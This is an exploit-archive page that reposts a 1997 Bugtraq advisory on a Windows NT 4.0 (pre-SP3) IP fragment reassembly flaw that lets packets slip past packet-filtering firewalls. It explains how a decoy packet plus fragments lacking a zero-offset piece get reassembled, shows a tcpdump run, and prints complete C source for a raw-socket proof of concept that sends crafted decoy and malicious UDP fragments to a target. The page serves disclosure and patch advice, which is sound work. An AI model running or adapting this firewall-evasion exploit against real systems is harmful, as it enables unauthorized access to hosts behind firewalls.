NT fragmentation attack

Summary
Description:A flaw in the NT fragment reassembly algorithm allows you to smuggle packets to NT boxes through packet-filtering firewalls. You "hide" the TCP header in an offset IP fragment and just neglect to send the first (zero offset) packet. NT (Pre-SP3) will still happily reassemble your packet, placing the fragment with the lowest-offset at the front.
Author:Thomas Lopatic
Compromise:Talk to NT boxes behind packet-filtering firwalls
Vulnerable Systems:NT 4.0 w/o SP3 installed, and probably 3.51
Date:10 July 1997
Notes:I *LOVE* this advisory. Fully detailed ... includes source code so I don't have to spend 5 hours reproducing this. Thanks Thomas!
Details


Date: Thu, 10 Jul 1997 05:45:54 -0500
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: A New Fragmentation Attack

http://www.dataprotect.com/ntfrag/

 A New Fragmentation Attack

 by Thomas Lopatic, 970709

 This page is brought to you by Data Protect.

  The attack presented in this article is not quite up to date since it
 applies only to Windows NT 4.0 systems which haven't applied Service
 Pack 3. However, it presents a quite interesting scenario which once
 more demonstrates that packet filtering firewalls may be insecure in
 very subtle ways.

 1 Impact

 The attack affects Windows NT 4.0 hosts (up to and including Service
 Pack 2) that are protected by a firewall which is based on packet
 screening. Stateful inspection firewalls may also be concerned,
 depending on their implementation.

 Using this weakness, an outsider is able to pass IP datagrams through
 the firewall to the Windows NT host, i.e. access the host as if the
 firewall did not exist.

 This problem has been fixed with Service Pack 3. Upgrade NOW!

 2 Description

 When reassembling a fragmented IP packet, the Microsoft implementation
 does not require the first fragment to have an offset value of zero.
 It merely checks, whether the sum of the lengths of the collected
 fragments equals the total length of the original unfragmented IP
 packet. If enough fragments have been received so that this condition
 holds, the NT stack will happily reassemble what it has got so far.

 So - how does it know about the total length of the original packet?
 Since, during normal operation, all fragments but the last have the MF
 (more fragments) bit set, Microsoft's stack waits until it has
 received a fragment F without the MF bit and then reasons that the
 length of the unfragmented datagram must have been offset of F +
 length of F. Apparently Microsoft have tried to be particularly
 efficient since this method is faster than traversing the whole list
 of fragments to check for completeness.

 Let me illustrate this mechanism with an example. Say that we have an
 original packet of 48 bytes which we send as three fragments F1, F2
 and F3, each with a length of 16 bytes. Now suppose that they arrive
 out of order, first F2, then F3 and eventually F1. The following table
 shows NT's notion of the total packet length after each fragment has
 arrived.
  Fragment #Offset Length MF bit Total Length           Data Collected

  F2        16     16     1      0 (no change, since MF 16
                                 = 1)

  F3        32     16     0      48 (= offset + length =32
                                 32 + 16)

  F1        0      16     1      48 (no change, since MF48
                                 = 1)
 After Total Length equals Data Collected, the IP stack decides that it
 has received all fragments and starts reassembling. To exploit this
 goodie courtesy of Microsoft, we will clear the MF bit on another
 fragment. Suppose we send another two fragments F1, and F2 as follows.
  Fragment #Offset Length MF bit Total Length    Data Collected

  F1        16     16     0      32              16 (= offset + length
                                                 = 16 + 16)

  F2        32     16     1      32 (MF = 1, no  32
                                 change)
 We have just sent two fragments, none of which has an offset of zero,
 yet the NT protocol stack will correctly reassemble them into a 32
 byte IP packet.

 3 Exploit Details

 Exploiting this feature is a bit more complicated than it seems at
 first sight. Since the IP stack stores the IP header of a fragment (to
 use it later for the reassembled packet) if and only if its offset is
 zero, we must send a decoy packet first, which must be carefully
 crafted so that it will be stored at exactly the same memory location
 as our next packet, which is the malicious one without the
 zero-offset-fragment. So, the bogus datagram will reuse the header
 information of our first datagram.

 Imagine that we would like to attack a WWW server behind a firewall.
 Then we would send one decoy to port 80, a malicious packet to 23,
 another decoy to port 80, another bogus packet to port 23, etc. In
 this way we can establish a telnet session through the packet screen.

 But what do we do when we hit a packet screen (e.g. screend) which
 requires for each fragmented packet a fragment with an offset of zero
 to be present? We send such a fragment and simply give it a time to
 live that is short enough so that it will reach the firewall but never
 the destination host. Another option would be to insert an invalid
 checksum into its IP header so that it will be dropped at the
 destination host.

 4 Example Code

 In order to back up the above theory with an example, I have written a
 short program which sends a decoy UDP datagram to port 9 (discard) of
 my NT system and after that another UDP datagram to port 7 (echo). I
 have used port 255 as the source port. The program runs on NetBSD 1.2
 and should be easily portable to any BSD system featuring the Berkeley
 Packet Filter. Here is the output of tcpdump after an example run.

 bob:/usr/home/tl# tcpdump
 tcpdump: listening on ed0
 01:54:38.751853 bob.255 > alice.discard: udp 248 (frag 256:256@0+)
 01:54:38.752252 bob > alice: (frag 256:256@256)
 01:54:38.752645 bob > alice: (frag 512:256@256)
 01:54:38.753054 bob > alice: (frag 512:256@512+)
 01:54:38.755716 alice.echo > bob.255: udp 248
 01:54:38.755992 bob > alice: icmp: bob udp port 255 unreachable
 ^C
 6 packets received by filter
 0 packets dropped by kernel
 bob:/usr/home/tl#

 As can be easily seen, alice, my NT system, responds (line seven in
 the above paragraph) to the two fragments sent by bob (lines five and
 six in the above paragraph). The first two fragments (lines three and
 four) make up the decoy packet. Eventually, alice gets an ICMP
 message, since bob does not have any service listening at port 255.
 The source code for this little demo program is available.

 5 Conclusions

 Once again it has been shown that packet filtering firewalls can be a
 dangerous thing to deploy. In a way, they always have to rely on the
 protected hosts to handle IP packets in the expected manner. And
 sometimes these hosts fail to do so.

 Hopefully this example will show people that a solid application
 gateway may be a better choice than all those fast and flexible packet
 screens.

 6 Service Pack 3

 This Service Pack fixes the problem mentioned above. It introduces a
 check, whether the IP stack has seen a fragment with an offset of
 zero, before reassembly is done.

 However, I will not stop investigating. Maybe Microsoft has hidden
 some more goodies for us to discover. :)
/*
   This programs demonstrates a new kind of fragmentation attack
   involving Windows NT 4.0 hosts behind packet filtering
   firewalls. See http://www.dataprotect.com/ntfrag/ for details
   on this attack.

   It should compile cleanly on any BSD system which has the
   Berkeley Packet Filter installed and has been tested on
   NetBSD 1.2 against a Windows NT 4.0 (SP2) host.

   OpenBSD patches provided by Theo de Raadt <deraadt@cvs.openbsd.org>.

   SERVICE PACK 3 FIXES THIS PROBLEM! INSTALL IT - NOW!

   Thomas Lopatic (thomas@dataprotect.com), 970709
*/

#include <sys/types.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/errno.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <net/bpf.h>
#include <net/if.h>
#include <stdlib.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>

char bpf_dev[] = "/dev/bpf1";   /* the BPF device to use */
char inter[] = "ed0";           /* the ethernet device we'll attach to */
char src[] = "172.16.0.2";      /* our address */
char dest[] = "172.16.0.1";     /* the target system's address */
int sport = 255;                /* the source port for the UDP datagram */
int dport = 9;                  /* the decoy destination port */
int real_dport = 7;             /* the real destination port */

u_short calc_sum(u_short start, u_short *buff, int len)
{
  u_long sum = start;

  while (len--)
    sum += *buff++;

  sum = (sum >> 16) + (sum & 0xffff);
  sum = (sum >> 16) + (sum & 0xffff);

  return sum;
}

void dump_hex(u_char *buffer, int size)
{
  int i, off = 0;

  while (off < size) {
    printf("%.4x:", off);
    for (i = 0; i < 16 && i + off < size; i++)
      printf(" %.2x", buffer[i + off]);
    printf("\n");
    off += i;
  }
}

int main(int ac, char *av[])
{
  int i, s, k, bpf, res = 0, true = 1;
  unsigned char dgram[276];
  union {
    unsigned long l[3];
    unsigned short s[6];
    unsigned char c[12];
  } pseudo;
  struct ip *iph;
  struct udphdr *udph;
  struct sockaddr_in daddr;
  struct timeval to = {0, 500000};
  int blen;
  u_char *bbuff;
  struct ifreq req;
  struct bpf_hdr *bhdr;

  if (getuid()) {
    printf("you must be root to use this program\n");
    return 12;
  }

  if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    perror("socket");
    res = 1;
  } else {
    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &true, sizeof(true)) < 0) {
      perror("setsockopt");
      res = 2;
    } else if ((bpf = open(bpf_dev, O_RDWR)) < 0) {
      perror("open");
      res = 3;
    } else {
      if (ioctl(bpf, BIOCGBLEN, &blen) < 0) {
	perror("ioctl(BIOCGBLEN)");
	res = 4;
      } else if ((bbuff = malloc(blen)) == NULL) {
	perror("malloc");
	res = 5;
      } else {
	strcpy(req.ifr_name, inter);
	if (ioctl(bpf, BIOCSETIF, &req) < 0) {
	  perror("ioctl(BIOSETIF)");
	  res = 6;
	} else if (ioctl(bpf, BIOCSRTIMEOUT, &to) < 0) {
	  perror("ioctl(BIOCSRTIMEOUT)");
	  res = 7;
	} else {
	  daddr.sin_len = sizeof(daddr);
	  daddr.sin_family = AF_INET;
	  daddr.sin_port = dport;
	  daddr.sin_addr.s_addr = inet_addr(dest);
       
	  for (i = 0; i < sizeof(dgram); dgram[i++] = 0);
	  for (i = 0; i < 3; pseudo.l[i++] = 0);

	  iph = (struct ip *)&dgram[0];
	  udph = (struct udphdr *)&dgram[20];

	  iph->ip_v = IPVERSION;
	  iph->ip_hl = 5;
#ifdef __OpenBSD__
	  iph->ip_len = htons(276);
#else
	  iph->ip_len = 276;
#endif
	  iph->ip_id = 1;
	  iph->ip_ttl = 255;
	  iph->ip_p = pseudo.c[9] = IPPROTO_UDP;
	  iph->ip_src.s_addr = pseudo.l[0] = inet_addr(src);
	  iph->ip_dst.s_addr = pseudo.l[1] = inet_addr(dest);

	  /*
	    offset = 0, length = 256, MF = 1
	    -> total length is not affected by this fragment
	  */

#ifdef __OpenBSD__
	  iph->ip_off = htons(0x2000);
#else
	  iph->ip_off = 0x2000;
#endif
	  iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);

	  udph->uh_sport = ntohs(sport);
	  udph->uh_dport = ntohs(dport);
	  udph->uh_ulen = pseudo.s[5] = ntohs(256);
	  udph->uh_sum = ~calc_sum(calc_sum(0, pseudo.s, 6), (u_short *)udph,
				   128);

	  /* send the first half of the decoy */

	  if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
		     sizeof(daddr)) < 0) {
	    perror("sendto");
	    res = 8;
	  }

	  /*
	    offset = 256, length = 256, MF = 0
	     -> total length is set to 512 by this fragment
	  */

#ifdef __OpenBSD__
	  iph->ip_off = htons(32);
#else
	  iph->ip_off = 32;
#endif
	  iph->ip_sum = 0;
	  iph->ip_sum = calc_sum(0, (u_short *)iph, 10);
	  for (i = 20; i < 276; dgram[i++] = 0);

	  /* send the second half of the decoy */

	  if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
		     sizeof(daddr)) < 0) {
	    perror("sendto");
	    res = 9;
	  }

	  iph->ip_id++;
	  iph->ip_sum = 0;
	  iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);

	  udph->uh_sport = ntohs(sport);
	  udph->uh_dport = ntohs(real_dport);
	  udph->uh_ulen = pseudo.s[5] = ntohs(256);
	  udph->uh_sum = ~calc_sum(calc_sum(0, pseudo.s, 6), (u_short *)udph,
				   128);

	  /*
	     send the first half of the real datagram
	     we have kept the offset settings from above
	     offset = 256, length = 256, MF = 0
	     -> total length is set to 512 by this fragment
	  */

	  if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
		     sizeof(daddr)) < 0) {
	    perror("sendto");
	    res = 10;
	  }

	  /*
	     offset = 512, length = 256, MF = 1
	     -> total length is not affected
	  */

#ifdef __OpenBSD__
	  iph->ip_off = htons(0x2040);
#else
	  iph->ip_off = 0x2040;
#endif
	  iph->ip_sum = 0;
	  iph->ip_sum = calc_sum(0, (u_short *)iph, 10);
	  for (i = 20; i < 276; dgram[i++] = 0);

	  /* send the second half of the real datagram */

	  if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
		     sizeof(daddr)) < 0) {
	    perror("sendto");
	    res = 11;
	  }
	}
	free(bbuff);
      }
      close(bpf);
    }
    close(s);
  }
  return res;
}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: